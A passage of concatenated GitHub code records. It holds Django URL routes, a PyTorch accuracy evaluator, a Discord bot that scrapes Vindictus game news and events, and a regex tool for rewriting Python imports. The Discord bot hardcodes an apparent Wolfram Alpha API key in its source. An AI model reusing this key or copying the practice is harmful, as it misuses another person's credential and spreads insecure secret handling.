import views\n\nurlpatterns = [\n url(r'^profesor-listado/$', views.profesor_listado, name='profesor_listado'),\n url(r'^profesor-crear/$', views.profesor_crear_modificar, name='profesor_crear'),\n url(r'^profesor-modificar/(?P\\d+)/$', views.profesor_crear_modificar, name='profesor_modificar'),\n url(r'^alumno-listado/$', views.alumno_listado, name='alumno_listado'),\n url(r'^alumno-detalle/(?P\\d+)/$', views.alumno_detalle, name='alumno_detalle'),\n url(r'^alumno-registrar/$', views.alumno_crear_modificar, name='alumno_crear'),\n]\n","repo_name":"danielhuamani/Proyecto-taller-base-datos","sub_path":"src/apps/alumno_profesor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24036347444","text":"import torch\nimport torchvision\nfrom sklearn.metrics import confusion_matrix\nimport numpy as np\nfrom torchvision import transforms\n\ndef evaluate_model(model, data_loader_test, device):\n '''\n Evaluation function. Calculates accuracy for the model using testset.\n Args:\n model (torch model): network model\n data_loader_test (torch Dataloader): testsets dataloader\n device (str): device that calculates the results, commonly 'cpu' or 'cuda:0'\n Returns:\n score (float): A score representing accuracy on testset. Multiple lower scores over few epochs might\n mean overfitting.\n data_log (numpy array): num_classes x num_classes confusion matrix. Tells the positive results compared to\n false negatives.\n '''\n model.eval()\n model.to(device=device)\n predictions, ground_truth = [], []\n correct = 0\n\n for batch_num, data in enumerate(data_loader_test):\n #Correct input data format and set device\n images = torch.stack([i[0]for i in data])\n images = images.to(device=device)\n targets = np.array([i[1] for i in data])\n \n with torch.no_grad():\n prediction = model(images)\n #Choose max prediction to represent class\n prediction = prediction.detach().cpu().numpy()\n prediction = np.argmax(prediction, axis=1)\n \n #Add preditcions and ground truths to the result list\n predictions += list(prediction)\n ground_truth += list(targets)\n \n #Compare gt and pred lists and calculate number\n #of correct predictions\n for i in range(len(predictions)):\n if predictions[i] == ground_truth[i]:\n correct += 1\n score = correct / len(ground_truth)\n\n class_names = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\n return score, predictions, ground_truth, class_names\n","repo_name":"Averu333/Classification_project","sub_path":"utils/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5939426335","text":"import asyncio\nimport discord\nimport json\nfrom bs4 import BeautifulSoup\nimport requests\nimport time\nimport datetime\nimport functools\nfrom concurrent.futures import CancelledError\nimport aiohttp\nimport math\nimport string\nimport youtube_dl\nimport async_timeout\nfrom PIL import Image\nimport io\nimport re\nimport sys\nimport os\n\npost_queue = asyncio.Queue()\nwolfram_queue = asyncio.Queue()\n\ndev = True if \"--dev\" in sys.argv or \"-d\" in sys.argv else False\nbot_name = \"Dev bot\" if dev else \"Vindictus Bot\"\n\nprint(\"Starting \" + bot_name)\ntoken_file = \"token_dev.txt\" if dev else \"token.txt\"\nconfig_file = \"dev.config\" if dev else \"bot.config\"\nwith open(token_file) as 
f:\n token = f.read()\nif not \"messages.json\" in os.listdir():\n sent_messages = []\n with open(\"messages.json\", \"w+\") as f:\n json.dump({\"messages\": sent_messages}, f, indent=4)\nelse:\n with open(\"messages.json\") as f:\n sent_messages = json.load(f)[\"messages\"]\n\nwith open(config_file) as f:\n configs = json.load(f)\n\nif not \"notifications.json\" in os.listdir():\n notifications = []\n with open(\"notifications.json\", \"w+\") as f:\n json.dump(notifications, f, indent=4)\nelse:\n with open(\"notifications.json\") as f:\n notifications = json.load(f)\n\nlog_file = \"log.log\"\nwolfram_appid = \"7W664G-6TT5XQA4XX\"\nwolfram_url = \"http://api.wolframalpha.com/v1/result\"\nmonths_re = \"January|February|March|April|May|June|July|August|September|October|November|December\"\n#months_re = \"Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec\"\nmonths_array = [\"\", \"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\", \"November\", \"December\"]\n#months_array = [\"\", \"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"]\ndays_re = \"([0-9]|)[0-9]\"\nyears_re = \"20[0-9][0-9]\"\nnews_log_length = 35\n\ntry:\n open(log_file).close()\nexcept FileNotFoundError:\n open(log_file, \"w+\").close()\n\nwith open(\"news.json\") as news_json:\n news = json.load(news_json)\n \nnews_link = \"http://vindictus.nexon.net/news/all/\"\n\nclass Event:\n def __init__(self, name=None, start=None, end=None, link=None, jjson=None):\n self.name = name\n self.start = start\n self.end = end\n self.url = link\n\n if jjson != None:\n self.from_json(jjson)\n\n def is_going_on(self):\n return self.start < datetime.datetime.now() < self.end\n\n def has_finished(self):\n return datetime.datetime.now() > self.end\n\n def is_new(self):\n return datetime.timedelta() < datetime.datetime.now() - self.start < datetime.timedelta(days=3)\n\n def print_self(self):\n print(self.name)\n print(self.start)\n print(self.end)\n\n def to_json(self):\n return {\n \"name\": self.name,\n \"url\": self.url,\n \"start\": self.start.timestamp(),\n \"end\": self.end.timestamp()\n }\n\n def from_json(self, jjson):\n self.name = jjson[\"name\"]\n self.url = jjson[\"url\"]\n self.start = datetime.datetime.fromtimestamp(jjson[\"start\"])\n self.end = datetime.datetime.fromtimestamp(jjson[\"end\"])\n\nwith open(\"events.json\") as events_json:\n events_sales = json.load(events_json)\n events = list(map(lambda x: Event(jjson=x), events_sales[\"events\"]))\n sales = list(map(lambda x: Event(jjson=x), events_sales[\"sales\"]))\n \n\nclass discordClient(discord.Client):\n async def on_ready(self): \n self.post_channels = []\n self.player = None\n self.voice = None\n self.trash_messages = []\n\n servers_in_configs = configs[\"guilds\"].keys()\n for server in self.servers:\n if not server.id in servers_in_configs:\n configs[\"guilds\"][server.id] = configs[\"base\"].copy()\n post_channel = configs[\"guilds\"][server.id][\"news_channel\"]\n if post_channel:\n post_channel = self.get_channel(post_channel)\n self.post_channels.append(post_channel)\n print(\"Posting to: \" + post_channel.name + \" in \" + server.name)\n appinfo = await self.application_info()\n self.owner = appinfo.owner\n try:\n self.tasks\n printlog(\"Client restarted for some reason\")\n except AttributeError:\n self.tasks = []\n self.tasks.append(asyncio.ensure_future(get_news(), loop = self.loop))\n self.tasks.append(asyncio.ensure_future(news_poster(self), 
loop = self.loop))\n self.tasks.append(asyncio.ensure_future(wolfram_responder(self), loop = self.loop))\n self.tasks.append(asyncio.ensure_future(notifier(self), loop = self.loop))\n log(str(datetime.datetime.now()) + \": Ready\")\n\n async def on_server_join(self, server):\n for ch in server.channels:\n if ch.name == \"general\":\n post_ch = ch\n break\n configs[\"guilds\"][server.id] = configs[\"base\"].copy()\n if post_ch:\n configs[\"guilds\"][server.id][\"news_channel\"] = post_ch.id\n await self.send_message(\n post_ch,\n \"Posting news to this channel. Change this with !channel *#general*\"\n )\n print(\"Posting to \" + post_ch.name + \" in \" + server.name)\n\n async def on_server_remove(self, server):\n self.post_channels = [ch for ch in self.post_channels if ch.server != server]\n if server.id in configs[\"guilds\"]:\n del configs[\"guilds\"][server.id]\n \n async def on_message(self, message):\n # !DELMSG AND !GAME\n if message.channel.is_private and \"!game\" in message.content:\n if message.author == self.owner:\n await self.change_presence(game =\n discord.Game(name = \" \".join(message.content.split()[1:])))\n elif message.channel.is_private and \"!delmsg\" in message.content:\n if message.author == self.owner:\n msgid = message.content.split()[-1]\n msg = None\n if len(message.content.split()) == 2:\n msg = discord.utils.find(lambda m: m.id == msgid, self.messages)\n errmsg = \"No such message found, try !delmsg [ch id] [msg id]\"\n elif len(message.content.split()) == 3:\n chid = message.content.split()[-2]\n ch = self.get_channel(chid)\n if ch:\n msg = await self.get_message(ch, msgid)\n errmsg = \"Couldn't find a message with id \" + msgid\n else:\n errmsg = \"Couldn't find a channel with id \" + chid\n else:\n errmsg = \"Incorrent parameter count\"\n \n if not msg:\n await self.send_message(message.channel, errmsg)\n else:\n try:\n await self.delete_message(msg)\n await self.send_message(message.channel, \"Message deleted\")\n except:\n await self.send_message(message.channel, \"Couldn't delete message\")\n elif len(message.content.split()) > 1 and message.content.split()[0] == \"!purge\":\n # !purge userid start_msg_id end_msg_id\n appinfo = await self.application_info()\n if message.author == appinfo.owner:\n auth = message.content.split()[1]\n start_msg_id = message.content.split()[2]\n end_msg_id = message.content.split()[3]\n try:\n start_msg = await self.get_message(message.channel, start_msg_id)\n end_msg = await self.get_message(message.channel, end_msg_id)\n await self.purge_from(\n message.channel,\n check=lambda msg: msg.author.id == auth,\n before=end_msg,\n after=start_msg)\n except discord.Forbidden:\n await self.send_message(message.channel, \"Not allowed\")\n except discord.NotFound:\n await self.send_message(message.channel, \"Message not found\")\n except discord.HTTPException:\n await self.send_message(message.channel, \"Failed\")\n else:\n await self.send_message(message.channel, \"You have no permission\")\n \n \n\n # !DELMESSAGES\n elif message.channel.is_private and \"!delmessages\" in message.content.lower():\n # syntax: !delmessages chid list of msgid\n cnt = message.content.lower()\n chid = cnt.split()[1]\n messageids = cnt.split()[2:]\n ch = self.get_channel(chid)\n messages = []\n for msgid in messageids:\n messages.append(await self.get_message(ch, msgid))\n if len(messages) > 1:\n try:\n await self.delete_messages(messages)\n except discord.Forbidden:\n for msg in messages:\n try:\n await self.delete_message(msg)\n except Exception as e:\n 
await self.send_message(message.channel, e)\n\n elif len(messages) == 1:\n await self.delete_message(messages[0])\n await self.send_message(message.channel, \"Deleted messages\")\n\n\n # HANDLE SNOWVISION\n elif len(message.content.split()) >= 2 and message.content.lower().split()[0] == \"!snowvision\":\n valid_extensions = [\"jpeg\", \"jpg\", \"png\"]\n url = message.content.split(\" \")[-1].split(\"?\")[0]\n if url.split(\".\")[-1].lower() in valid_extensions:\n await sendImage(url, message.channel, self)\n\n # HANDLE EVENTS AND SALES\n elif message.content.lower() in [\"!events\", \"!sales\"]:\n await postEvents(message.content.lower(), message.channel, self)\n\n # HANDLE REFRESH\n elif message.content.lower() == \"!refresh\":\n await self.send_message(message.channel, \"Refreshing\")\n urls = []\n for news_piece in news[\"news\"]:\n if not news_piece[\"link\"] in urls:\n urls.append(news_piece[\"link\"])\n for url in urls:\n await parseEvents(url)\n await self.send_message(message.channel, \"Finished\")\n\n # HANDLE EMOTES\n elif \"!emote\" in message.content.lower() or \"!animated\" in message.content.lower():\n for emoji in self.get_all_emojis():\n if emoji.name.lower() == message.content.lower().split()[-1]:\n pref = \"a\" if \"!animated\" in message.content.lower() else \"\"\n name = emoji.name\n idd = emoji.id\n await self.send_message(message.channel, \"<{}:{}:{}>\".format(pref, name, idd))\n try: \n await self.delete_message(message)\n except:\n print(\"Tried to delete message, unable\")\n break \n\n # HANDLE REACTIONS\n elif \"!react\" in message.content.lower():\n # msg syntax !react [msg id] [ch id] [emote name]\n split = message.content.lower().split()\n msgid = split[1]\n chid = split[2] if len(split) == 4 else None\n emotename = split[-1]\n emote = None\n for emoji in self.get_all_emojis():\n if emoji.name.lower() == emotename:\n emote = emoji\n break\n if emote:\n ch = self.get_channel(chid)\n msg = await self.get_message(ch, msgid) if chid else discord.utils.find(lambda m: m.id == msgid, self.messages)\n await self.add_reaction(msg, emote)\n await asyncio.sleep(0.5)\n await self.wait_for_reaction(timeout=10, message=msg)\n await self.remove_reaction(msg, emote, msg.server.me)\n\n # HANDLE ADDING NEW EVENT\n elif message.content.lower() == \"!addevent\":\n global events\n global sales\n self.trash_messages.append(message)\n\n timeo = 30\n sender = message.author\n channel = message.channel\n event_type = None\n while event_type == None:\n m = await self.send_message(channel, \"Enter type (event / sale)\")\n self.trash_messages.append(m)\n resp = await self.wait_for_message(timeout=timeo, author=sender)\n if resp != None:\n self.trash_messages.append(resp)\n if resp.content.lower() in [\"event\", \"sale\"]:\n event_type = resp.content.lower()\n else:\n break\n\n if event_type != None:\n event_name = None\n m = await self.send_message(channel, \"Enter {} name\".format(event_type))\n self.trash_messages.append(m)\n name_resp = await self.wait_for_message(timeout=timeo, author=sender)\n if name_resp != None:\n self.trash_messages.append(name_resp)\n event_name = name_resp.content\n \n if event_name != None:\n start_date = None\n while start_date == None:\n m = await self.send_message(channel, \"Enter starting date\")\n self.trash_messages.append(m)\n start_resp = await self.wait_for_message(timeout=timeo, author=sender)\n if start_resp != None:\n self.trash_messages.append(start_resp)\n start_mon = re.search(months_re, start_resp.content)\n start_day = re.search(days_re, 
start_resp.content)\n if start_mon != None and start_day != None:\n start_mon = months_array.index(start_mon.group())\n start_date = datetime.datetime(\n datetime.date.today().year,\n start_mon,\n int(start_day.group()),\n 10\n )\n else:\n break\n\n if start_date != None:\n end_date = None\n while end_date == None:\n m = await self.send_message(channel, \"Enter ending date\")\n self.trash_messages.append(m)\n end_resp = await self.wait_for_message(timeout=timeo, author=sender)\n if end_resp != None:\n self.trash_messages.append(end_resp)\n end_mon = re.search(months_re, end_resp.content)\n end_day = re.search(days_re, end_resp.content)\n if end_mon != None and end_day != None:\n end_mon = months_array.index(end_mon.group())\n end_year = datetime.date.today().year\n end_year = end_year + 1 if end_mon < start_mon else end_year\n end_date = datetime.datetime(\n end_year,\n end_mon,\n int(end_day.group()),\n 10\n )\n else:\n break\n\n if end_date != None:\n link = None\n m = await self.send_message(channel, \"Enter event link\")\n self.trash_messages.append(m)\n link_resp = await self.wait_for_message(timeout=timeo, author=sender)\n if link_resp != None:\n self.trash_messages.append(link_resp)\n link = link_resp.content\n\n if event_type != None and event_name != None and start_date != None and end_date != None:\n e = Event(event_name, start_date, end_date, link)\n events.append(e) if event_type == \"event\" else sales.append(e)\n sales_not_finished = [sale for sale in sales if not sale.has_finished()]\n events_not_finished = [event for event in events if not event.has_finished()]\n with open(\"events.json\", \"w+\") as f:\n json.dump({\n \"events\": [event.to_json() for event in events_not_finished],\n \"sales\": [sale.to_json() for sale in sales_not_finished]}, f, indent=4)\n sender_name = sender.nick or sender.name\n await self.send_message(channel, \"{} added a new {}: {}\".format(sender_name,\n event_type,\n event_name))\n else:\n await self.send_message(channel, \"Stopped adding a new event\")\n\n await self.delete_messages(self.trash_messages)\n\n #!ACTIVE AND !INACTIVE\n elif message.content.lower() in [\"!active\", \"!inactive\"]:\n if message.server.name in [\"Vindi\", \"Dev serv\"]:\n active_role = discord.utils.get(message.server.roles, name=\"Vindictus Active\")\n if message.content.lower() == \"!active\":\n if not active_role in message.author.roles:\n await self.add_roles(message.author, active_role)\n await self.add_reaction(message, \"✅\")\n else:\n await self.add_reaction(message, \"❌\")\n elif message.content.lower() == \"!inactive\":\n if active_role in message.author.roles:\n await self.remove_roles(message.author, active_role)\n await self.add_reaction(message, \"✅\")\n else:\n await self.add_reaction(message, \"❌\")\n\n # !NOTIFY\n elif \"!notify\" in message.content.lower() and \"!notify\" in message.content.lower().split()[0]:\n if \"!notify_everyone\" in message.content.lower():\n text = \"@everyone \"\n elif \"!notify_here\" in message.content.lower():\n text = \"@here \"\n else:\n text = \"\"\n global notifications\n cnt = message.content\n time_pattern = \"([0-2]?[0-9]:[0-5][0-9])\"\n day_pattern = \"([0-3]?[0-9])(?: ?st| ?nd| ?rd| ?th)\"\n full_pattern = \"(\" + months_re + \")\" + \" \" + day_pattern + \",* \" + time_pattern + \" (.*)\"\n result = re.search(full_pattern, cnt)\n if result:\n cur_year = datetime.datetime.now().year\n month = result.group(1)\n day = result.group(2)\n time = result.group(3)\n text += result.group(4)\n dt = datetime.datetime(\n 
year=cur_year,\n month=months_array.index(month),\n day=int(day),\n hour=int(time.split(\":\")[0]),\n minute=int(time.split(\":\")[1]),\n )\n notifi = {\n \"time\": dt.timestamp(),\n \"text\": text,\n \"channel\": message.channel.id\n }\n notifications.append(notifi)\n with open(\"notifications.json\", \"w\") as f:\n json.dump(notifications, f, indent=4)\n await self.send_message(message.channel, \"New notification created!\")\n else:\n await self.send_message(message.channel, \"Couldn't parse the message, make sure its format is '!notify December 24th 18:00 Merry Christmas Everyone!'\")\n\n # CONFIGS\n elif \"!channel\" in message.content and len(message.channel_mentions) == 1:\n perm = message.author.server_permissions\n owner = message.author == self.owner\n if perm.administrator or perm.manage_server or owner:\n ch = message.channel_mentions[0]\n self.post_channels.append(ch)\n configs[\"guilds\"][message.server.id][\"news_channel\"] = ch.id\n await self.send_message(message.channel, \"Posting news to \" + ch.mention)\n\n #HANDLE WOLFRAM ALPHA\n elif len(message.content) > 1 and message.content.lower().split()[0] in [\"!wolfram\", \"!alpha\", \"!wolf\", \"!wolframalpha\"]:\n await wolfram_queue.put(message)\n\n\n async def on_member_join(self, member):\n if member.server.name == \"Vindi\":\n newb_role = discord.utils.get(member.server.roles, name=\"Newbs\")\n await self.add_roles(member, newb_role)\n\ndef log(text):\n limit = 2000\n if not str(datetime.date.today().year) + \"-\" in text:\n text = str(datetime.datetime.now()) + \": \" + text\n if not \"\\n\" in text:\n text += \"\\n\"\n with open(log_file) as log:\n lines = log.readlines()\n lines.append(text)\n\n with open(log_file, \"w\") as log:\n log.write(\"\".join(lines[max(0, len(lines) - limit):len(lines)]))\n\ndef printlog(text):\n print(text)\n log(text)\n\nasync def get_news():\n global news\n while loop.is_running():\n new_news = {\"news\": []}\n\n try:\n with async_timeout.timeout(10):\n async with aiohttp.ClientSession() as session:\n async with session.get(news_link) as response:\n resText = await response.text()\n except asyncio.TimeoutError:\n await asyncio.sleep(60)\n soup = BeautifulSoup(resText, \"html.parser\")\n\n news_raw = soup.find_all(\"div\", class_ = \"news-list-item\")\n\n for news_piece in news_raw:\n news_item = {}\n news_item[\"title\"] = news_piece.find(class_ = \"news-list-item-title\").text.replace(\"\\r\", \"\").replace(\"\\n\", \"\").replace(\"\\t\", \"\").replace(\" \", \"\")\n news_item[\"description\"] = news_piece.find(class_ = \"news-list-item-text\").text.replace(\"\\r\", \"\").replace(\"\\n\", \"\").replace(\"\\t\", \"\").replace(\" \", \"\")\n news_item[\"link\"] = \"http://vindictus.nexon.net\" + news_piece.find(class_ = \"news-list-link\").get(\"href\")\n news_item[\"image\"] = news_piece.find(class_ = \"news-thumbnail\").attrs[\"style\"][22:-2]\n new_news[\"news\"].append(news_item)\n\n news_list = new_news[\"news\"]\n news_list.reverse()\n for news_piece in news_list:\n if not news_piece in news[\"news\"]:\n await post_queue.put(news_piece)\n news[\"news\"].append(news_piece)\n log(\"New news found\")\n if new_news[\"news\"] != []:\n with open(\"news.json\", \"w\") as news_json:\n news[\"news\"] = news[\"news\"][max(0, len(news[\"news\"]) - news_log_length):]\n json.dump(news, news_json, indent=4)\n log(\"News gotten\")\n\n await asyncio.sleep(60)\n\nasync def news_poster(client):\n global sent_messages\n while loop.is_running():\n item = await post_queue.get()\n title = item[\"title\"]\n 
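# --- Aside: the get_news()/news_poster() pair above is a textbook asyncio
# producer/consumer -- the scraper enqueues only items it has not logged yet,
# and the poster drains the queue independently. A minimal standalone sketch of
# that pattern follows (no Discord and no network; fake_fetch and the item
# shape are hypothetical stand-ins, not the bot's actual API).
import asyncio

async def fake_fetch(tick):
    # Stand-in for the aiohttp + BeautifulSoup scrape; newest item first.
    return [{"title": "News %d" % tick}, {"title": "News %d" % (tick - 1)}]

async def producer(queue, polls=3):
    seen = []
    for tick in range(polls):
        items = await fake_fetch(tick)
        items.reverse()                   # oldest first, as get_news() does
        for item in items:
            if item not in seen:          # dedup against the local log
                seen.append(item)
                await queue.put(item)
        await asyncio.sleep(0)            # yield control; the bot sleeps 60 s here

async def consumer(queue):
    while True:
        item = await queue.get()
        print("posting:", item["title"])  # the bot builds a Discord embed here
        queue.task_done()

async def main():
    queue = asyncio.Queue()
    worker = asyncio.ensure_future(consumer(queue))
    await producer(queue)
    await queue.join()                    # wait until every queued item is handled
    worker.cancel()

asyncio.run(main())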
link = item[\"link\"]\n desc = item[\"description\"]\n news_id = link.split(\"/\")[4]\n emb = discord.Embed(\n title=title + \" - Vindictus\",\n description=desc,\n color=133916,\n url=link\n ).set_thumbnail(\n url=item[\"image\"]\n ).set_author(\n name=\"Vindictus - Official Website\",\n url=\"https://vindictus.nexon.net\"\n )\n \n for message in sent_messages:\n if message[\"id\"] == news_id:\n id_dict = message\n break\n else:\n id_dict = {\"id\": news_id}\n sent_messages.append(id_dict)\n\n maint = \"maintenance\" in title.lower() or \"maintenance\" in desc.lower()\n win_update = \"windows update\" in title.lower() or \"windows update\" in desc.lower()\n completed_maint = (maint or win_update) and \"complete\" in desc.lower()\n extended_maint = (maint or win_update) and \"extend\" in desc.lower()\n for channel in client.post_channels:\n if not channel.id in id_dict or completed_maint or extended_maint:\n sent_message = await client.send_message(channel, embed=emb)\n printlog(\"Sent: \" + title)\n id_dict[channel.id] = sent_message.id\n else:\n try:\n previous_message = await client.get_message(channel, id_dict[channel.id])\n await client.edit_message(previous_message, embed=emb)\n printlog(\"Edited: \" + title)\n except discord.NotFound:\n printlog(\"Tried to look for a message, not found\")\n except discord.Forbidden:\n printlog(\"Tried to look for a message, not allowed\")\n except discord.HTTPException:\n printlog(\"Tried to look for / edit a message, couldn't\")\n\n sent_messages = sent_messages[max(0, len(sent_messages) - news_log_length):]\n with open(\"messages.json\", \"w\") as messages_json:\n json.dump({\"messages\": sent_messages}, messages_json, indent=4)\n\n await parseEvents(link)\n\nasync def notifier(client):\n global notifications\n while loop.is_running():\n to_delete = []\n for notification in notifications:\n if notification[\"time\"] < time.time():\n await client.send_message(client.get_channel(notification[\"channel\"]), notification[\"text\"])\n to_delete.append(notification)\n if to_delete:\n for n in to_delete:\n notifications.remove(n)\n with open(\"notifications.json\", \"w\") as f:\n json.dump(notifications, f, indent=4)\n await asyncio.sleep(30)\n\nasync def wolfram_responder(client):\n while loop.is_running():\n message = await wolfram_queue.get()\n await client.send_typing(message.channel)\n i = \" \".join(message.content.split()[1:])\n params = {\"appid\": wolfram_appid, \"input\": i}\n async with aiohttp.ClientSession() as session:\n async with session.get(wolfram_url, params = params) as resp:\n answer = await resp.text()\n if answer == \"Wolfram|Alpha did not understand your input\":\n answer = \"I didn't quite understand\"\n if len(answer) > 1000:\n count = math.ceil(len(answer) / 1000)\n for x in range(0, count):\n await client.send_message(message.channel, answer[1000 * x : 1000 * (x + 1)])\n else:\n await client.send_message(message.channel, answer)\n\nasync def sendImage(url, destination, client):\n try:\n with async_timeout.timeout(20):\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n respBytes = await response.read()\n imgname = \"img.\" + url.split(\".\")[-1]\n oldimg = Image.open(io.BytesIO(respBytes))\n newimg = oldimg.convert(mode=\"L\")\n newimg.save(imgname)\n await client.send_file(destination, imgname)\n printlog(\"Sent an image\")\n except asyncio.TimeoutError:\n await asyncio.sleep(5)\n\nasync def parseEvents(url):\n global sales\n global events\n new_sales = []\n new_events = []\n tables = 
[]\n \n try:\n with async_timeout.timeout(10):\n async with aiohttp.get(url) as response:\n respText = await response.text()\n print(\"Got a response\")\n soup = BeautifulSoup(respText, \"html.parser\")\n tables = soup.find_all(\"table\")\n except asyncio.TimeoutError:\n print(\"timeout\")\n\n items = {}\n names = []\n\n for table in tables:\n datas = table.find_all(\"td\")\n if len(datas) < 3:\n continue\n if len(datas) == 4 or datas[2].text.strip() not in [\"Sale Start\", \"Event Start\", \"Starting Date\"]:\n e_type = \"event\" if datas[0].text.strip() == \"Event Name\" else \"sale\"\n name = datas[2].text.strip()\n if not name in items:\n names.append(name)\n items[name] = {}\n if datas[1].text.strip() == \"Event Start\":\n items[name][\"start\"] = datas[3].text.strip()\n elif datas[1].text.strip() == \"Event End\":\n items[name][\"end\"] = datas[3].text.strip()\n items[name][\"type\"] = e_type\n else:\n name = datas[1].text.strip()\n start = datas[3].text.strip()\n end = datas[5].text.strip()\n e_type = \"event\" if datas[0].text.strip() == \"Event Name\" else \"sale\"\n items[name] = {\"start\": start, \"end\": end, \"type\": e_type}\n names.append(name)\n\n\n for name in names:\n item = items[name]\n if not (\"start\" in item and \"end\" in item):\n continue\n start = item[\"start\"]\n end = item[\"end\"]\n e_type = item[\"type\"]\n obj = None\n try:\n start_year = re.search(years_re, start)\n end_year = re.search(years_re, end)\n if start_year == None:\n start_year = datetime.date.today().year\n else:\n start_year = int(start_year.group())\n if end_year == None:\n end_year = datetime.date.today().year\n else:\n end_year = int(end_year.group())\n\n start_date = datetime.datetime(\n int(start_year),\n months_array.index(re.search(months_re, start).group()),\n int(re.search(days_re, start).group()),\n 10)\n\n end_date = datetime.datetime(\n int(end_year),\n months_array.index(re.search(months_re, end).group()),\n int(re.search(days_re, end).group()),\n 10)\n \n if start_date > end_date:\n end_date = end_date.replace(year=end_year + 1)\n \n obj = Event(name, start_date, end_date, url)\n except Exception as e:\n print(e)\n\n if obj:\n new_sales.append(obj) if e_type == \"sale\" else new_events.append(obj)\n\n old_sale_names = list(map(lambda x: x.name, sales))\n old_event_names = list(map(lambda x: x.name, events))\n\n sales += list(filter(lambda x: not x.name in old_sale_names, new_sales))\n events += list(filter(lambda x: not x.name in old_event_names, new_events))\n\n sales_not_finished = list(filter(lambda x: not x.has_finished(), sales))\n events_not_finished = list(filter(lambda x: not x.has_finished(), events))\n\n if (sales_not_finished != sales or events_not_finished != events\n or new_sales != [] or new_events != []):\n with open(\"events.json\", \"w+\") as f:\n json.dump({\"events\": list(map(lambda x: x.to_json(), events_not_finished)),\n \"sales\": list(map(lambda x: x.to_json(), sales_not_finished))}, f, indent=4)\n\nasync def postEvents(type, destination, client):\n\n li = events if type == \"!events\" else sales\n going_on = list(filter(lambda x: x.is_going_on(), li))\n\n emb = discord.Embed(colour=discord.Colour(int(\"020b1c\", 16)))\n emb.set_author(\n icon_url=\"https://cdn.discordapp.com/attachments/344883962612678657/399689459081150485/vindidiscord.png\",\n name=\"Vindictus \"+ type.replace(\"!\", \"\").capitalize())\n for event in going_on:\n start_month = months_array[event.start.month].capitalize()\n end_month = months_array[event.end.month].capitalize()\n 
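# --- Aside: parseEvents() (and the !addevent dialogue) reduce date handling to
# one recipe: regex out month/day/optional year, default the year to today's,
# and roll the end date one year forward when it would otherwise precede the
# start (December -> January sales). A standalone sketch of just that logic,
# with simplified regexes rather than the bot's exact patterns:
import datetime
import re

MONTHS = ["", "January", "February", "March", "April", "May", "June", "July",
          "August", "September", "October", "November", "December"]
MONTH_RE = "|".join(MONTHS[1:])

def parse_date(text, default_year):
    month = MONTHS.index(re.search(MONTH_RE, text).group())
    day = int(re.search(r"([0-9]|)[0-9]", text).group())
    year = re.search(r"20[0-9][0-9]", text)
    year = int(year.group()) if year else default_year
    return datetime.datetime(year, month, day, 10)   # events tick over at 10:00

def parse_range(start_text, end_text):
    year = datetime.date.today().year
    start = parse_date(start_text, year)
    end = parse_date(end_text, year)
    if start > end:                        # range wrapped past New Year
        end = end.replace(year=end.year + 1)
    return start, end

print(parse_range("December 24", "January 7"))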
start_date = start_month + \" \" + str(event.start.day)\n end_date = end_month + \" \" + str(event.end.day)\n name = event.name\n if event.is_new():\n name += \" (New!)\"\n emb.add_field(\n name=name,\n value=\"{} - {}. [Link]({})\".format(start_date, end_date, event.url),\n inline=False\n )\n await client.send_message(destination, embed=emb)\n\nloop = asyncio.get_event_loop()\ndiscord_client = discordClient(loop=loop)\n\ntry:\n loop.run_until_complete(discord_client.start(token))\n printlog(\"Loop finished\")\nexcept KeyboardInterrupt:\n printlog(\"Keyboard interrupted\")\nfinally:\n printlog(\"Logging out\")\n loop.run_until_complete(discord_client.logout())\n for task in discord_client.tasks:\n task.cancel()\n loop.stop()\n loop.close()\n printlog(\"Loop closed\")\n with open(config_file, \"w\") as f:\n json.dump(configs, f, indent=4)\n","repo_name":"teemusallyla/vindictus-discord-bot","sub_path":"VindictusBot.py","file_name":"VindictusBot.py","file_ext":"py","file_size_in_byte":33178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36570289468","text":"import re\nfrom consts import *\n\ndef format_regex(pattern: str, string: str) -> str:\n return pattern.format(string.replace('.', r'\\.'))\n \n\ndef print_diff(line: str, new_line: str) -> None:\n print(line[:-1], ' -->', new_line[:-1])\n\ndef replace_with(data: str, regex: str, target: str) -> str:\n lines = data.splitlines(True)\n new_data = ''\n for line in lines:\n if re.search(regex, line):\n new_line = re.sub(regex, target, line)\n new_data += new_line\n print_diff(line, new_line)\n else:\n new_data += line\n\n return new_data\n\n\ndef replace_keyword_import(data: str, to_str: str, regex: str) -> str:\n target = TARGET_KEYWORD_PATTERN.format(to_str)\n lines = data.splitlines(True)\n new_data = ''\n for line in lines:\n searched = re.search(regex, line)\n if searched and ' as ' in line:\n raise Exception('Found \"as\" in non-as-import')\n elif searched:\n new_line = re.sub(regex, target, line)\n new_data += new_line\n print_diff(line, new_line)\n else:\n new_data += line\n return new_data\n\n\ndef replace_namespace_of_import(data: str, to_str: str, regex: str, regex_in_string: str) -> str:\n target = fr'{to_str}.'\n lines = data.splitlines(True)\n new_data = ''\n for line in lines:\n if re.search(regex, line):\n if \"'\" in line or '\"' in line:\n if not re.search(regex_in_string, line):\n new_line = re.sub(regex, target, line)\n new_data += new_line\n print_diff(line, new_line)\n else:\n new_data += line\n raise Exception('Can\\'t handle quotes problem')\n else:\n new_line = re.sub(regex, target, line)\n new_data += new_line\n print_diff(line, new_line)\n else:\n new_data += line\n\n return new_data\n\n\ndef replace_as_import(data: str, to_str: str, regex: str) -> str:\n target = fr'import {to_str} as \\2'\n return replace_with(data, regex, target)\n\n\ndef replace_from_import(data: str, to_str: str, regex: str) -> str:\n target = f'from {to_str} import '\n return replace_with(data, regex, target)\n","repo_name":"motobep/spears","sub_path":"re_replace.py","file_name":"re_replace.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} 